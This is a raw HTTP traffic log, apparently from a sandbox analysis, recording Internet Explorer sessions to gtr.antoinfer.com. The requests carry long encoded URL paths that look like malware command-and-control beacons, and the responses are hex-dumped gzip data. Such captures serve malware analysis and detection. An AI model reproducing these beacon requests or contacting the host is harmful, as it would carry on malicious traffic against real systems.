Timestamp	kBytes transferred	Direction	Data
Jul 5, 2021 16:53:12.451152086 CEST	1588	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 5, 2021 16:53:12.991707087 CEST	1588	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 05 Jul 2021 14:53:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49728	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 5, 2021 16:53:13.536216021 CEST	1589	OUT	GET /IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_2FuI_2FqZ2s_2FiaO0J_/2FTRLU31mRGflU2b/ZIJ0FncJBL1ujMu/UAyv0uh4NdsHQb_2Fp/7IlErLThx/qx9lbHRBIr_2BN2fcH7p/3MZS8xBk2HV8HO_2FwY/sjaecD1Ad9d4_2Bhfj7Udw/txqy4ndWQ8c2I/i_2FDCoi/J8FwQUA7HNUWWZ74vTmq4PN/8fRY05oVkC/eLBfQLcjbzJ0zm8P9/lrnxZ8213Jiq/fQMuhQcrOSv/_2FzhSntnuW3P7/C3J8_2BPrwDMXrvKewIwt/CP9ILXpGj47Z_2/F HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 5, 2021 16:53:14.473695993 CEST	1591	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 05 Jul 2021 14:53:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b b5 82 83 40 14 45 3f 88 02 08 5e e2 ee 41 3b dc dd f9 fa cd b6 29 c2 ec cc 9b 7b cf 49 36 b2 d9 7d 2e f9 2b 07 c7 7e 31 df 25 c4 63 ba c0 e1 34 4c 46 6d b7 79 2e 38 d2 a6 85 7d 39 b8 74 f0 e0 74 40 58 33 25 43 0e 9e fe c4 aa 1e 26 5c 50 23 19 0b 66 fd d2 06 28 7a b6 75 10 99 06 63 4b 9a 5e b9 c0 c5 70 0c cf 8b bc 8b 7c 20 fe 63 73 25 ee 75 c4 77 88 4a 14 04 3e 4a b5 2b 5f 36 15 2e 37 94 04 a6 01 dd b4 1a fa 57 f3 bf 25 ff 59 d2 9a d0 a0 02 21 e8 e7 1a db ec 75 8a 64 5b d5 14 9d 4f 0b e5 1e bf 5a dc 33 23 cf d2 ae d1 16 a7 a0 e8 9b 32 9f f0 fa 22 86 9d 76 28 fa a6 29 d2 2b 43 16 cc 1a 99 11 cd 03 81 4c ad 82 57 92 e7 be d8 ec f9 e1 f8 35 27 31 ed d2 29 95 3a d3 e8 35 dc 82 4c ca 1f c2 c7 a4 f2 1b c0 2c c5 3f 6a e0 4c 16 2d 30 6d a1 af 16 e8 d3 d6 2a 91 c0 77 5b 0b cc 77 8b 76 2a 8f 4c ce ec e9 61 fb a0 67 d7 09 bd 51 2b 3e e3 f0 96 3e 9f 97 b8 9f f4 bb b9 4f 0b 41 20 df cb 4a 08 5b a6 20 d2 37 5d 2f 31 7e 41 72 19 8e c4 a7 4a 76 c3 ae c2 d3 d8 0a 32 e9 0d e0 36 5c 73 3f e2 88 e5 38 26 5d 5e b4 0d 1e 8d 2f 70 d2 37 b9 1b 7b 53 ac c6 4b d0 bd 53 2a 49 77 44 91 c8 a0 f7 65 c0 bf 13 80 ea ae 8e 22 ea fa 50 ca d6 04 38 4e 5a 14 27 0f 3a 35 fd 6a 2d cd 77 1b 40 3e c5 e6 d2 6e 11 50 77 71 1d b8 72 58 57 9d 6f 88 56 9a 1b 37 28 7a 0e 4d c8 23 3e 73 dd a9 04 48 6e 90 74 3d 5f fa 7b 3d 54 b2 0d 13 b6 32 8c c8 34 af 5b db 2f ab 30 c7 b6 11 8a e7 31 91 b5 37 25 0f d7 1c 66 ef 33 5c 03 be 4c 39 f9 fa 99 a7 95 7e 65 31 33 f6 7e 72 83 1d 2d 33 d6 8d 60 b2 59 05 32 1c 2c cf c3 25 91 64 d3 5b 7f 5f 3c c5 57 9b 96 9f b6 05 d6 56 2a 07 8d 18 bc b3 a1 99 af 80 5e 24 3d 84 0b 8c 9d cb 08 17 e6 1a ae 6a 92 a7 98 77 50 59 e5 74 e1 57 71 f8 4f 34 4e 06 ae 47 e9 1c 8c 27 39 c8 5f 23 5c ed 44 63 9e 60 ef 4c ec 81 92 b6 2a 4a fc 6e 12 51 c7 38 24 5b e8 4a ac 01 41 69 ee 56 2d 58 39 bf a7 6c 38 c5 29 c0 16 11 91 78 4d e3 30 04 b0 cd ea 9e 84 19 d4 f0 d5 1d 4b c6 6a 95 55 05 55 1f 42 11 e6 db a2 3b e3 24 b6 bb 65 e9 07 a6 0d 16 ce ca 63 83 b5 5e d1 75 de 35 10 9d 2f 93 57 3e 0b 23 57 4e 35 2c dc 99 6c ed ab c3 d8 b8 ca e1 58 6e 86 b3 58 98 67 eb dd 9d 98 88 1e d6 df 69 45 b2 49 32 bf f3 70 7c 21 2d cc b8 70 1d fd de 11 c3 14 59 58 86 34 55 a7 26 ba 9a 7c 3b 88 d0 d5 1a a3 4f 08 b9 5a c8 a3 cc c1 7e 18 c3 cc bf fc 5d a3 f1 4e 37 e1 e0 25 d6 e7 39 c0 14 d9 b8 2d bf 89 b2 2a 9d a6 b8 46 10 66 6d 40 2f e4 20 d3 21 7f a4 ae 29 d8 76 1b 2a 31 05 64 14 41 2c 47 aa 0e 94 53 80 6b f0 d1 45 e2 20 99 4e 00 2a 68 b2 d7 12 04 0f fd 35 5c 00 5e 71 80 e1 17 27 31 75 09 c6 11 62 5a ad 8a f8 4e 1f c8 5c 63 4c 77 83 cd e2 aa 34 b0 18 e3 41 1f 95 e8 f3 cd 9d 0b e1 ed 92 71 df 69 58 33 9f 73 56 55 2c 2b d1 7e c2 46 8e 5f 9a c8 e8 4d 4e fd e0 dc 59 d4 0c 3c 2c dd cc db 15 d6 7d cb 7a 18 c1 c9 7e 0e 3a 74 8b 4c c0 90 63 8b de 25 28 70 f9 d0 7c c4 bb 2e c6 e7 11 5e 8f 15 7e f1 a8 e4 23 58 64 42 77 b3 1f 23 97 eb 4c 37 66 db 9c 2b 87 f2 a9 e1 37 c7 c1 79 98 67 e3 7e 58 9f ca 2b ae c2 63 de 98 96 33 63 34 1c 41 7e a8 a2 9a 3b 53 6e 3f ec f7 cb 52 5e 28 d9 cd c2 fb d7 00 1b ab 5a 0e 4b ef 7f dc 23 bb 10 58 0e 6d 91 bc 10 8c a6 f3 24 68 05 82 8d 9c 07 fa Data Ascii: 2000@E?^A;){I6}.+~1%c4LFmy.8}9tt@X3%C&\P#f(zucK^p\| cs%uwJ>J+_6.7W%Y!ud[OZ3#2"v()+CLW5'1):5L,?jL-0mw[wvLagQ+>>OA J[ 7]/1~ArJv26\s?8&]^/p7{SKSIwDe"P8NZ':5j-w@>nPwqrXWoV7(zM#>sHnt=_{=T24[/017%f3\L9~e13~r-3`Y2,%d[_<WV^$=jwPYtWqO4NG'9_#\Dc`LJnQ8$[JAiV-X9l8)xM0KjUUB;$ec^u5/W>#WN5,lXnXgiEI2p\|!-pYX4U&\|;OZ~]N7%9-Ffm@/ !)v1dA,GSkE Nh5\^q'1ubZN\cLw4AqiX3sVU,+~F_MNY<,}z~:tLc%(p\|.^~#XdBw#L7f+7yg~X+c3c4A~;Sn?R^(ZK#Xm$h
Jul 5, 2021 16:53:14.473731041 CEST	1592	IN	Data Raw: 72 5e 22 38 89 9a b7 70 2b ab 1b 19 71 44 62 14 ec c6 9e a5 67 61 0a 39 86 d6 91 bc ab 2a 0e 86 26 5b 83 31 e6 6b be 5b eb db 4b 29 ad c1 19 56 6f 20 26 c3 26 22 89 ca 3b 7d 22 ce fb a8 cc d2 7e 1f 3a 3b 51 99 72 4d e3 40 18 79 fd 30 4d 58 ec 4c Data Ascii: r^"8p+qDbga9*&[1k[K)Vo &&";}"~:;QrM@y0MXL}vovS9B6(@#,QpjTn5&{Wor!tiC\|tqI-1>'}^sNszHS.gI!!=/`S&
Jul 5, 2021 16:53:14.473753929 CEST	1594	IN	Data Raw: 5b c5 30 f5 7b e2 11 84 d5 cb 21 14 81 fa de 8f b2 92 46 58 73 36 28 85 dd e6 7e ba f6 33 4a 58 8f 2a b6 f4 d9 d8 e6 07 85 ae 9c 81 74 47 c8 2b c7 04 6f 26 e4 fd 49 9f cd 4c 32 ec 77 07 a8 0d b3 3a 60 1c 61 e8 b5 57 3f 98 d8 d5 fe aa c9 a5 d5 e8 Data Ascii: [0{!FXs6(~3JX*tG+o&IL2w:`aW?)-pH5qh(\|pRN=?jOVkC$eS\L\W3Q\F,iyqS%//PA,0EZ(6)^4OP
Jul 5, 2021 16:53:14.473774910 CEST	1595	IN	Data Raw: 24 7c 16 e9 37 16 e2 f8 21 71 ca 36 8d d1 99 13 94 4a 46 e6 31 7d 4d 35 7e d1 c1 48 3c 80 38 d9 e4 59 02 cf 07 2f 3b ac 5e 08 37 25 1f a1 9a 02 f2 1c 62 39 c9 91 fb 53 d4 44 64 b9 af f9 62 01 3b 36 4b fd 8d bc 2c 13 eb 4d bb cc 0f 37 b2 88 3c 7c Data Ascii: $\|7!q6JF1}M5~H<8Y/;^7%b9SDdb;6K,M7<\|\ws@\|Gzg^&\|iJMxn_r-nXqZ'h0&,5,bDVx e@m,?\iPOq#Uun_}8w>
Jul 5, 2021 16:53:14.473797083 CEST	1596	IN	Data Raw: 3d b1 cb 72 12 b4 49 2b 34 0a 11 78 8e 99 5b ad b6 e6 e9 34 87 c3 8e 44 b8 ef be 69 4d 5a b9 1b 3e 5f 9d aa a7 6a 11 71 56 f1 cd 90 19 b9 be 08 e2 9a 6d b2 b8 c5 2a f0 2e 05 50 06 6d 17 be b8 f7 fd 48 c3 c5 fc 8b 95 07 8a e5 fe 4a 16 b8 67 8d f2 Data Ascii: =rI+4x[4DiMZ>_jqVm*.PmHJgQ>,gIC.a4\|c?c-v R[\Os!<Y}f#o(@'-)QKGdVSH?Q30XsVEhX5P5oz
Jul 5, 2021 16:53:14.473819971 CEST	1598	IN	Data Raw: 9f 92 b8 ec 92 f8 37 45 12 03 97 08 cc b1 4d 3a df cf 57 e6 b5 8e 42 5c 35 25 91 35 6e 90 67 90 4f 29 31 c0 c3 f2 b3 da 6a 21 5c 25 63 20 2c be 6f 7d 3a 1c 45 83 47 35 35 46 d8 bc 09 62 03 c6 e3 f1 ec 0f f5 34 cc 48 69 f0 52 7e 26 6f 52 7d e0 a1 Data Ascii: 7EM:WB\5%5ngO)1j!\%c ,o}:EG55Fb4HiR~&oR}r/~pnIg{wE3b)?~fLZ%'F~b\|uNrP!cr4<>9p{s`]CHO*;#JW0~</-V7T91
Jul 5, 2021 16:53:14.475953102 CEST	1599	IN	Data Raw: b7 b9 39 3b 16 00 9d 6f b1 6f 95 3f fb 64 52 2e 01 d2 b2 71 f4 2d 9d 73 5c 5d 39 28 66 61 3b 30 13 c4 c6 8c 11 bc 8f 82 bb 8e 84 19 dd 34 82 7c 48 b7 e4 16 6b d5 1b 7d 1b f0 0d d8 34 4e 68 5f 08 a2 fc 8b 10 e8 1b 00 ad e9 b7 3a 93 e0 e9 8c cb 6e Data Ascii: 9;oo?dR.q-s\]9(fa;04\|Hk}4Nh_:n.BG/Ca=)Y?(lC.~^4dk"+;*H,W.E^d\|#_I@S'q='B!J.=H8
Jul 5, 2021 16:53:14.475979090 CEST	1601	IN	Data Raw: f2 e4 a8 e5 e9 69 d4 eb 48 5c 5e 03 59 ff fc c8 48 d9 86 44 21 8a d9 b2 b0 cb 64 69 82 a9 ed 1f f9 a3 b0 1d 6e 87 c5 02 62 86 aa e5 0d e1 cf 3e 95 2e 5a 8d 7f ab 7f 0c 2f 03 95 bf bb d5 19 01 fb 27 c3 a1 22 9b d4 04 ad ec 07 ee c3 0a 3a a8 b7 63 Data Ascii: iH\^YHD!dinb>.Z/'":c.-];8DS{8Q$<V&4`G@RgKQ``C#s{gf@\|P0br[j,TuXdDOPsMhY5/G<<5u
Jul 5, 2021 16:53:14.476250887 CEST	1602	IN	Data Raw: 7b 74 2e cc 3e ec 1a 90 9f 8d 7d 54 cf ef 81 2f 2a df 73 d7 67 3a 4b b8 f3 11 04 1f 31 d1 f7 10 b3 9a a3 1c 73 86 63 45 3b 81 0d 4d 85 fc ed 01 6c c5 8a 29 d1 e0 b1 12 b3 64 ff c7 44 a9 76 9a d8 17 16 f6 44 23 e5 d2 d1 31 57 e7 6e a0 fd 89 c6 ce Data Ascii: {t.>}T/*sg:K1scE;Ml)dDvD#1Wn_udC/.2upA7As2'C.lWCYO.M-xG:?2\|`+qKw#Bsu,}& ycWb?].8<-W3<
Jul 5, 2021 16:53:14.476272106 CEST	1603	IN	Data Raw: 98 bf fc 40 4e d9 6d 0c 5b aa 3d cd 83 c7 dd 80 e2 fd d6 32 b8 cd d2 43 54 26 3b cf dc 00 ca 43 9c 11 ad 40 72 bb ba c5 ea dc fb 74 14 91 31 64 cb 36 ed b8 09 fb 4f 9b b7 26 26 9e 2f 0a 7f e5 1e c9 30 b8 c5 65 4a 7e 69 d5 8e b1 82 be 03 8e fa e1 Data Ascii: @Nm[=2CT&;C@rt1d6O&&/0eJ~iCR(~O)U{ZkS7>7;;nq'37.Ly?~A[CRah<b\|L0JxNEOO,7nbARiRD
Jul 5, 2021 16:53:14.670016050 CEST	1605	IN	Data Raw: d0 39 c5 92 23 49 7a ae 4d 06 df 88 0b e2 3c 7b 50 fb 04 f8 88 98 9d 5e 97 29 24 7e 9a b1 8b 02 d0 8a b7 35 1a 0b d3 0c d5 fc 96 41 a0 37 ba 35 82 1a ad b8 cd 1a 23 0c d0 b0 b8 61 95 37 1b fc 29 9e 99 f9 cc af f9 0c bb 76 4e bc 26 16 63 24 23 34 Data Ascii: 9#IzM<{P^)$~5A75#a7)vN&c$#4]WXD\3X:>S PEC1#'eXS]6'ob, (Ecu0U`(2]d^]qt(GL`$ll7R%-$9TiQfDc~1{]]d\|4rnF

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49733	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 5, 2021 16:53:17.360209942 CEST	1852	OUT	GET /LQ0ImNchzaabH7Vdh_/2FtRScd2v/QQzFkXdgAhow_2FcWrEP/n3sYFzsTbYVS3adrQdv/5Nzc_2BoRJpkAsHtAz6xV3/PsE8tlG0HHtLJ/T5TqRkda/BLQo9v_2FZTJ_2FPNHoYsv1/ye7M3znq3j/msHJ000mSBJHPb7nZ/E46dHTxH_2B4/eeBIrQKxL9Y/THDXKoks2pteky/rz_2F_2F0HzAFdHANfOc3/VtFiNo945_2BUObZ/oZuZG5t2mblYFyG/ygnFakJ2W33SNUuycB/j7wv4YZIa/0Hblow_2BZFOik2zX2YB/PXGpfOrjekSAdA19ARh/ahTrlQtp6MFSLYtpjwx_2B/D_2FHvRt HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 5, 2021 16:53:18.346472025 CEST	1855	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 05 Jul 2021 14:53:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 95 45 b2 84 50 14 43 17 d4 03 78 0d 34 30 c4 dd 9d 19 ee ee ac fe ff 05 a4 92 ba 75 73 e2 a8 0d 14 9a 45 0d 8e 9f 70 7a 38 ed b8 b1 06 00 e4 b8 06 b5 5b 85 ea 9e 74 66 0d f4 36 0e 9b 43 34 49 3b 37 ab 4d cd be f9 85 51 4e e3 5d 78 b3 ae 2f a8 19 ef b0 48 56 f7 2e 41 4d 53 40 a0 bb ed e8 7e 93 93 57 ba 32 90 d5 e9 82 48 54 53 a7 bb ae cf 2a 5c 0c bf e2 d0 6c ee 63 10 b2 4d d8 c4 75 39 7d f5 a8 04 16 b9 5d 67 c0 96 5a 09 94 b4 72 e2 26 37 fc a4 a2 c9 54 84 e2 7a 2e 36 e1 9d 9b 1b 59 e9 11 64 a5 ba 75 73 08 7a 4b 0c 4d 58 9d 2b 90 06 98 ca 55 05 b5 db 96 bf 7d 47 e2 29 51 10 49 0b bc f0 3c 60 cd ef 62 79 4b d6 d1 11 9a c6 a9 f8 a0 13 2a ff 08 3d 26 cd a2 09 d6 5a 6a 1a 18 55 6a d7 7f 48 5b a2 18 fd 4d e9 bc 97 19 ad a2 f8 51 53 76 0b c2 9c ea ce 7b 62 94 ad b8 0c dc 96 ca 07 98 52 e5 eb a7 ff 3b 8c b3 61 7d 1f c9 c5 21 db 62 d4 24 9f 2c 47 0c 7b 5e 91 c8 03 f0 8c ab d8 98 af e8 79 eb b6 fa 6a e3 42 a1 59 f1 d9 de 1d ac d6 4b fc 3a e5 01 f5 c1 d3 e2 bd c9 d3 b6 d8 32 6b 2a c7 63 f5 79 4c ac 2e c7 fa 76 b1 9b f7 05 59 0d 10 51 f0 b7 c4 fb ac 13 a2 94 06 82 a9 c4 e1 29 5b 20 50 ea a4 f8 1f 85 72 a8 b8 6d f7 12 6a 49 93 07 51 5b 4d 15 9d fb 0e 7c 7c 4b 2c d5 da 28 c5 3b ea b7 05 77 9a 6b 39 a2 fd 7e 4a 0f 63 e4 da b6 a9 a2 7d 2f 30 d4 66 d5 bb 92 98 b2 61 bc 7e e1 68 c8 b3 39 71 e8 f2 c9 d9 2d cc fa 04 cd bd c0 7f 9a cd e4 bd 8e 5d f6 79 7d a9 e3 e9 ba 06 2e a0 e7 4e 21 21 7d a0 57 47 fb 3a 91 c3 a8 36 8a 15 d6 bd d5 f8 3f 4c 60 3c 13 cc 55 bb 31 0f f3 20 5b 0d 7e 3a bb 34 1e 39 2f 36 ef 0e 7a f9 81 65 1d 7d b0 44 24 47 08 d0 ff 11 b6 09 a6 ef 82 d1 c3 48 d1 48 dc 88 b9 85 b3 6a b3 d7 fd 0f 7e ed 1b be 08 29 8c 26 14 26 f0 27 88 82 f8 37 32 db 47 e0 bc 15 cf 31 e9 d7 ec e6 16 15 7e 38 e7 37 d9 48 00 cd 92 56 da 53 a8 41 c1 e4 60 f1 e1 ab a4 a4 b4 d7 14 a8 ae 1a 9c f8 bd 08 b8 d9 be 88 63 76 d5 f9 50 5e b5 6c 5e 55 51 a8 ce 14 f2 c7 b3 5e 13 37 f9 c7 5f b1 50 f2 ce da dd bf b4 b3 c6 f8 9b a2 12 2b 29 ea 5b db fa ec a7 5b a0 b9 9e d6 04 9f e5 a2 28 b1 09 fb 51 e3 69 c6 a9 64 05 6a 88 a0 db 8e 57 65 15 be 78 95 d6 fa a6 e8 e8 18 30 7d ca 4e 44 99 22 ea 72 ca 1e c4 27 9b ee 63 22 4d b4 28 52 eb 9e dc 90 d6 26 8e cc 6e cd ab ae ad ba 6e 81 6f be 8d d8 23 6c 1a 22 b0 90 1b bc 17 d2 b9 f8 f4 0c e8 8f 2f b9 f9 4d 82 74 ac 75 53 79 14 23 91 98 0c d7 85 de 3f 9d 8e 65 20 3c 9f e4 52 7d 78 d0 b9 da 9e 1a a4 4c 26 ac 86 a3 0b 9e 1c 7d 49 05 c5 e1 5d 6a 63 26 81 5e 85 6f 28 43 0f 99 db 3e b5 0c c4 ff 0f 32 7c 26 fb 07 ac 42 7c 72 c5 b1 1e 95 13 8e 64 07 ec da 82 c3 16 27 e1 53 27 9c 5a b8 0b 49 53 cb 87 42 cc cc d3 9e e8 23 0b cd b8 87 55 a7 87 4e fb ef 3c fb 5f 78 4d 09 82 1c 84 48 4c ac 33 3b ad e7 ff 96 51 97 0f a3 da cb fc ca 32 b5 4c 39 dd b8 86 19 04 93 af 04 18 2a ce d9 f7 b2 34 fd 08 0f 4c cc e6 ce a6 3e af 45 38 f6 d2 7d 59 20 9d 0e 71 ef 68 da 3c ee 58 64 e4 b8 df f9 90 de 42 e0 53 4f 87 73 ae a3 d8 31 ab f5 76 90 5a 5c a0 87 54 bc 88 cc 95 59 6d 72 76 6e 06 6c b2 45 f3 9f ea 2c a8 48 5c 36 b3 8f 3b f4 41 b4 39 c6 a7 5d 91 77 6b 5f 7f 30 a9 9b d4 f0 51 12 87 9d 09 69 27 1f e4 6d 56 04 4d 68 24 71 c5 b5 93 36 a9 14 Data Ascii: 767EPCx40usEpz8[tf6C4I;7MQN]x/HV.AMS@~W2HTS\lcMu9}]gZr&7Tz.6YduszKMX+U}G)QI<`byK=&ZjUjH[MQSv{bR;a}!b$,G{^yjBYK:2kcyL.vYQ)[ PrmjIQ[M\|\|K,(;wk9~Jc}/0fa~h9q-]y}.N!!}WG:6?L`<U1 [~:49/6ze}D$GHHj~)&&'72G1~87HVSA`cvP^l^UQ^7_P+)[[(QidjWex0}ND"r'c"M(R&nno#l"/MtuSy#?e <R}xL&}I]jc&^o(C>2\|&B\|rd'S'ZISB#UN<_xMHL3;Q2L94L>E8}Y qh<XdBSOs1vZ\TYmrvnlE,H\6;A9]wk_0Qi'mVMh$q6
Jul 5, 2021 16:53:18.346503973 CEST	1856	IN	Data Raw: f2 6b cf 90 24 22 db 80 7c f0 38 f7 84 b2 a7 28 3e e2 4e 55 3d 3a de 0c f1 eb 8d 07 87 d3 ac db 67 b0 de ff af ef 9e 98 6e 00 e8 0b 01 5e 49 d7 06 07 17 9e ab 76 1f 52 35 79 cc 83 bf 75 35 8b 52 4d bb cf 55 1a 9c f2 e0 5d 93 bd b8 bb 4b f5 3e 2f Data Ascii: k$"\|8(>NU=:gn^IvR5yu5RMU]K>/BufN~^GL#},pPJ"EC!p]M=k7l2Ku[}eR\|]\|W\9(Y6x\%>kY'e<u/$+1:p8qn

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49734	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 5, 2021 16:53:17.531347990 CEST	1853	OUT	GET /s96BBj_2BW0E7I/inPV3RC1ndWtP3TCiXWoq/7JGd2eicozVaSDqP/TIPKarKtLPkYLRx/VCo8CEXU6VSxFW20ap/EmssX5YuH/_2FmT3PaMcthev94lCLF/bWDeiN4zbJE6pfv8oTi/Qb34wmcConjidXNcLSenBo/rqyTVIe8oNi_2/FtqR6e_2/BJ_2F_2Ff8F8rmDwirrIz3L/Nk4szxk3_2/FsoXecNAHbdXzRM5b/qnqXpzn3ytbn/lcXf0S9I54h/nPX849yJE9mtRH/Mg8GQncb8LaArkE96Imgo/T60bsdjLtZH_2FnO/zpiezRZpQAYC8v0/MRTN6xcxZf9LqzW6jmrO/pZ HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 5, 2021 16:53:18.446711063 CEST	1857	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 05 Jul 2021 14:53:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b b5 82 83 40 14 45 3f 88 02 08 5e e2 ee 41 3b dc dd f9 fa cd b6 29 c2 ec cc 9b 7b cf 49 36 b2 d9 7d 2e f9 2b 07 c7 7e 31 df 25 c4 63 ba c0 e1 34 4c 46 6d b7 79 2e 38 d2 a6 85 7d 39 b8 74 f0 e0 74 40 58 33 25 43 0e 9e fe c4 aa 1e 26 5c 50 23 19 0b 66 fd d2 06 28 7a b6 75 10 99 06 63 4b 9a 5e b9 c0 c5 70 0c cf 8b bc 8b 7c 20 fe 63 73 25 ee 75 c4 77 88 4a 14 04 3e 4a b5 2b 5f 36 15 2e 37 94 04 a6 01 dd b4 1a fa 57 f3 bf 25 ff 59 d2 9a d0 a0 02 21 e8 e7 1a db ec 75 8a 64 5b d5 14 9d 4f 0b e5 1e bf 5a dc 33 23 cf d2 ae d1 16 a7 a0 e8 9b 32 9f f0 fa 22 86 9d 76 28 fa a6 29 d2 2b 43 16 cc 1a 99 11 cd 03 81 4c ad 82 57 92 e7 be d8 ec f9 e1 f8 35 27 31 ed d2 29 95 3a d3 e8 35 dc 82 4c ca 1f c2 c7 a4 f2 1b c0 2c c5 3f 6a e0 4c 16 2d 30 6d a1 af 16 e8 d3 d6 2a 91 c0 77 5b 0b cc 77 8b 76 2a 8f 4c ce ec e9 61 fb a0 67 d7 09 bd 51 2b 3e e3 f0 96 3e 9f 97 b8 9f f4 bb b9 4f 0b 41 20 df cb 4a 08 5b a6 20 d2 37 5d 2f 31 7e 41 72 19 8e c4 a7 4a 76 c3 ae c2 d3 d8 0a 32 e9 0d e0 36 5c 73 3f e2 88 e5 38 26 5d 5e b4 0d 1e 8d 2f 70 d2 37 b9 1b 7b 53 ac c6 4b d0 bd 53 2a 49 77 44 91 c8 a0 f7 65 c0 bf 13 80 ea ae 8e 22 ea fa 50 ca d6 04 38 4e 5a 14 27 0f 3a 35 fd 6a 2d cd 77 1b 40 3e c5 e6 d2 6e 11 50 77 71 1d b8 72 58 57 9d 6f 88 56 9a 1b 37 28 7a 0e 4d c8 23 3e 73 dd a9 04 48 6e 90 74 3d 5f fa 7b 3d 54 b2 0d 13 b6 32 8c c8 34 af 5b db 2f ab 30 c7 b6 11 8a e7 31 91 b5 37 25 0f d7 1c 66 ef 33 5c 03 be 4c 39 f9 fa 99 a7 95 7e 65 31 33 f6 7e 72 83 1d 2d 33 d6 8d 60 b2 59 05 32 1c 2c cf c3 25 91 64 d3 5b 7f 5f 3c c5 57 9b 96 9f b6 05 d6 56 2a 07 8d 18 bc b3 a1 99 af 80 5e 24 3d 84 0b 8c 9d cb 08 17 e6 1a ae 6a 92 a7 98 77 50 59 e5 74 e1 57 71 f8 4f 34 4e 06 ae 47 e9 1c 8c 27 39 c8 5f 23 5c ed 44 63 9e 60 ef 4c ec 81 92 b6 2a 4a fc 6e 12 51 c7 38 24 5b e8 4a ac 01 41 69 ee 56 2d 58 39 bf a7 6c 38 c5 29 c0 16 11 91 78 4d e3 30 04 b0 cd ea 9e 84 19 d4 f0 d5 1d 4b c6 6a 95 55 05 55 1f 42 11 e6 db a2 3b e3 24 b6 bb 65 e9 07 a6 0d 16 ce ca 63 83 b5 5e d1 75 de 35 10 9d 2f 93 57 3e 0b 23 57 4e 35 2c dc 99 6c ed ab c3 d8 b8 ca e1 58 6e 86 b3 58 98 67 eb dd 9d 98 88 1e d6 df 69 45 b2 49 32 bf f3 70 7c 21 2d cc b8 70 1d fd de 11 c3 14 59 58 86 34 55 a7 26 ba 9a 7c 3b 88 d0 d5 1a a3 4f 08 b9 5a c8 a3 cc c1 7e 18 c3 cc bf fc 5d a3 f1 4e 37 e1 e0 25 d6 e7 39 c0 14 d9 b8 2d bf 89 b2 2a 9d a6 b8 46 10 66 6d 40 2f e4 20 d3 21 7f a4 ae 29 d8 76 1b 2a 31 05 64 14 41 2c 47 aa 0e 94 53 80 6b f0 d1 45 e2 20 99 4e 00 2a 68 b2 d7 12 04 0f fd 35 5c 00 5e 71 80 e1 17 27 31 75 09 c6 11 62 5a ad 8a f8 4e 1f c8 5c 63 4c 77 83 cd e2 aa 34 b0 18 e3 41 1f 95 e8 f3 cd 9d 0b e1 ed 92 71 df 69 58 33 9f 73 56 55 2c 2b d1 7e c2 46 8e 5f 9a c8 e8 4d 4e fd e0 dc 59 d4 0c 3c 2c dd cc db 15 d6 7d cb 7a 18 c1 c9 7e 0e 3a 74 8b 4c c0 90 63 8b de 25 28 70 f9 d0 7c c4 bb 2e c6 e7 11 5e 8f 15 7e f1 a8 e4 23 58 64 42 77 b3 1f 23 97 eb 4c 37 66 db 9c 2b 87 f2 a9 e1 37 c7 c1 79 98 67 e3 7e 58 9f ca 2b ae 